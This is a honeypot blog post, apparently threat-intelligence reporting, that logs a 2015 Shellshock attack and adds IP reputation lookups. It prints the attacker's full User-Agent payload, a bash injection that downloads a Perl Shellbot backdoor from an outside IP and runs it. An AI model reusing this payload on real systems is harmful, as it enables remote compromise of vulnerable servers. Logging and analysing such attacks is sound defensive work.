BEGIN OF HTTP DATA:
2015-10-07 05:42:05
Source IP: 62.210.157.90
Country: FR RiskScore: 1 Malware: []
GET /hello HTTP/1.0
Host: 109.234.106.8
User-Agent: () { :;}; /bin/bash -c "cd /tmp ; rm -rf j* ; wget http://23.229.121.186/paf ; lwp-download http://23.229.121.186/paf ; curl -O /tmp/paf http://23.229.121.186/paf ; perl paf ; perl /tmp/paf ; rm -rf *ju;rm -rf jur*"
When I try to download the malware, Zonealarm reports a
Backdoor.Perl.Shellbot.s
62.210.157[.]90
Static Source: GeoIP data
- Country: France
- ASN: AS12876 ONLINE S.A.S.
Dynamic Source: SANS Internet Storm Cast
- comment:IP is listed on SANS ISC
- comment:This entry alone does not indicate a threat, please check the link
- Reference: https://isc.sans.edu/api/ip/62.210.157.90
Static Source: http://sendmespamids.blogspot.nl/ Blacklist
- Comment: Listed on Honeypot blacklist
- Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt
23.229.121[.]186
Static Source: GeoIP data
- Country: United States
- ASN: AS36352 ColoCrossing
Dynamic Source: SANS Internet Storm Cast
- comment:IP is listed on SANS ISC
- comment:This entry alone does not indicate a threat, please check the link
- Reference: https://isc.sans.edu/api/ip/23.229.121.186
Keine Kommentare:
Kommentar veröffentlichen